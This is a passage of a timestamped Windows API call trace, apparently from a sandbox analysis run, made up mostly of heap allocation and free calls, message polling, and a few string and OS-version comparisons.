dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0255.451] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0255.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0255.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.452] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0255.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.453] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0255.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.453] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0255.454] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0255.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0255.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0255.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0255.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0255.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0255.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.454] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0255.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0255.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0255.455] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0255.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0255.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0255.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0255.455] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0255.456] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.456] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0255.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0255.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0255.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.457] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0255.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0255.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0255.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.458] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0255.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0255.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0255.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0255.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0255.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.459] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0255.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0255.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0255.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0255.460] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0255.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0255.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0255.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0255.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0255.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0255.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0255.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0255.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0255.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0255.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.461] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0255.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0255.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0255.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0255.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.461] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0255.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.462] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0255.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0255.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0255.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.463] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0255.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0255.463] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0255.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0255.463] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0255.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0255.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0255.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0255.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0255.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0255.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.464] 